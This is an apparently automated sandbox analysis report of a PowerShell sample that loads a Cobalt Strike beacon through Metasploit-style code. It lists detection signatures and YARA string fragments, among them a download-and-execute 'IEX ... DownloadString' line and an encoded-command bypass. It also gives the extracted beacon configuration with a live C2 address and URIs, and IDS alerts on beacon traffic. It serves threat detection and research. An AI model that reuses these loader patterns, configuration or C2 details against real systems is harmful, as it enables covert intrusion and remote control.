Windows Analysis Report
3.ps1

Overview

General Information

Sample name: 3.ps1
Analysis ID: 1562630
MD5: 69c80576e5413dc4d0d60de98439f649
SHA1: 2fe44c3f073e661eb0cd6dd2c5890b067743ea5d
SHA256: 85856010d3e63101c30a3d061dd55c758350030dd9b14794044a479860abb37f
Tags: ps1, user-nawhack

Detection

CobaltStrike, Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected MetasploitPayload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found suspicious powershell code related to unpacking or dynamic code loading
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 1900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon offers a wealth of functionality to the attacker, including, but not limited to, command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that, once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
Malware Configuration (CobaltStrike, extracted from memory):
{"BeaconType": ["HTTP"], "Port": 8080, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "3.78.244.11,/dot.gif", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Yara matches on the submitted file

Source | Rule | Description | Author
3.ps1 | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security
3.ps1 | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth
  Strings:
  • 0x83:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0x5a8:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0x695:$s5: = [System.Convert]::FromBase64String(
  • 0x2fe:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0x4f1:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
Yara matches on memory dumps

Source | Rule | Description | Author
00000000.00000002.4122124036.0000022EF9EB0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security
00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_ee756db7 | Attempts to detect Cobalt Strike based on strings found in BEACON | unknown
  Strings:
  • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
  • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
  • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
  • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
  • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
  • 0x32d6a:$a11: Could not open service control manager on %s: %d
  • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
  • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
  • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
  • 0x33255:$a15: could not create remote thread in %d: %d
  • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x33203:$a17: could not write to process memory: %d
  • 0x32d9b:$a18: Could not create service %s on %s: %d
  • 0x32e24:$a19: Could not delete service %s on %s: %d
  • 0x32c89:$a20: Could not open process token: %d (%u)
00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_663fc95d | Identifies CobaltStrike via unidentified function code | unknown
  Strings:
  • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
(44 entries in total in the full report)
Yara matches on unpacked PE files

Source | Rule | Description | Author
0.2.powershell.exe.22ef9b10000.0.raw.unpack | JoeSecurity_CobaltStrike_2 | Yara detected CobaltStrike | Joe Security
0.2.powershell.exe.22efa0b0000.1.unpack | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
0.2.powershell.exe.22ef9b10000.0.raw.unpack | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
0.2.powershell.exe.22ef9b10000.0.raw.unpack | JoeSecurity_CobaltStrike_4 | Yara detected CobaltStrike | Joe Security
0.2.powershell.exe.22ef9b10000.0.raw.unpack | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
(40 entries in total in the full report)
Yara matches on AMSI script content

Source | Rule | Description | Author
amsi64_1900.amsi.csv | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security
amsi64_1900.amsi.csv | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth
  Strings:
  • 0xe5:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0x617:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0x70a:$s5: = [System.Convert]::FromBase64String(
  • 0x367:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0x55f:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

System Summary

Sigma rule matches

Source: Process started - Author: frack113 - Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", ProcessId: 1900, ProcessName: powershell.exe
Source: Network Connection - Author: Florian Roth (Nextron Systems) - Data: DestinationIp: 3.78.244.11, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Initiated: true, ProcessId: 1900, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process started - Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) - Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1", ProcessId: 1900, ProcessName: powershell.exe
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T19:57:52.370990+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 50013 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:58:04.324931+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 49730 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:58:26.502407+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 49731 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:58:48.674634+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 49738 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:59:10.821761+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 49739 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:59:33.097220+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 49767 | 3.78.244.11 | 8080 | TCP
2024-11-25T19:59:55.285301+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 49816 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:00:17.416993+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 49864 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:00:39.636064+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 49915 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:01:01.824176+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 49963 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:01:23.980870+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 50011 | 3.78.244.11 | 8080 | TCP
2024-11-25T20:01:46.137579+0100 | 2033713 | 1 | Targeted Malicious Activity was Detected | 192.168.2.4 | 50012 | 3.78.244.11 | 8080 | TCP


AV Detection

Source: 3.ps1 - Avira: detected
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp - Malware Configuration Extractor: CobaltStrike (the beacon configuration listed in full in the Overview section above: HTTP beacon to C2Server 3.78.244.11 on port 8080, GET URI /dot.gif, POST URI /submit.php, SleepTime 60000 ms, Jitter 0, Watermark 987654321)
Source: 3.ps1 - ReversingLabs: Detection: 73%
Source: Submitted Sample - Integrated Neural Analysis Model: Matched 92.5% probability
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Code function: 0_2_0000022EFA0B1184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_0000022EFA0B1184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Code function: 0_2_0000022EFA0E2020 CryptGenRandom,0_2_0000022EFA0E2020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Code function: 0_2_0000022EFA0C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_0000022EFA0C1C30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Code function: 0_2_0000022EFA0C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_0000022EFA0C9220

Networking

Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49730 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49816 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49864 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49915 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49963 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50011 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50012 -> 3.78.244.11:8080
Source: Network traffic - Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50013 -> 3.78.244.11:8080
Source: Malware configuration extractor - URLs: 3.78.244.11
Source: global traffic - TCP traffic: 192.168.2.4:49730 -> 3.78.244.11:8080
Source: Joe Sandbox View - ASN Name: AMAZON-02US
Source: global traffic - HTTP traffic detected:
  GET /dot.gif HTTP/1.1
  Accept: */*
  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Host: 3.78.244.11:8080
  Connection: Keep-Alive
  Cache-Control: no-cache
  (the same request, with identical headers and cookie value, is recorded 11 more times in this block)
Source: unknown - TCP traffic detected without corresponding DNS query: 3.78.244.11 (this entry is recorded 50 times in the report)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Code function: 0_2_0000022EFA0BE68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_0000022EFA0BE68C
Source: global traffic - HTTP traffic detected: GET /dot.gif HTTP/1.1 to Host 3.78.244.11:8080 with the same headers and cookie value as the request shown above (recorded 12 times in this block)
                      Source: powershell.exe, 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:%u/
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://3.78.244.11:8080/dot.gif
                      Source: powershell.exe, 00000000.00000002.4119501587.0000022EF9A2F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE2E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000000.00000002.4098790194.0000022EE2508000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

                      System Summary

                      Source: 3.ps1, type: SAMPLE | Matched rule: Metasploit Payloads - file msf-ref.ps1 | Author: Florian Roth
                      Source: amsi64_1900.amsi.csv, type: OTHER | Matched rule: Metasploit Payloads - file msf-ref.ps1 | Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader | Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader | Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts | Author: ditekSHen
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload | Author: ditekSHen
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts | Author: ditekSHen
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload | Author: ditekSHen
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader | Author: unknown
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload | Author: ditekSHen
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader | Author: unknown
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader | Author: unknown
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
                      Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: CobaltStrike payload | Author: ditekSHen
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader | Author: unknown
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
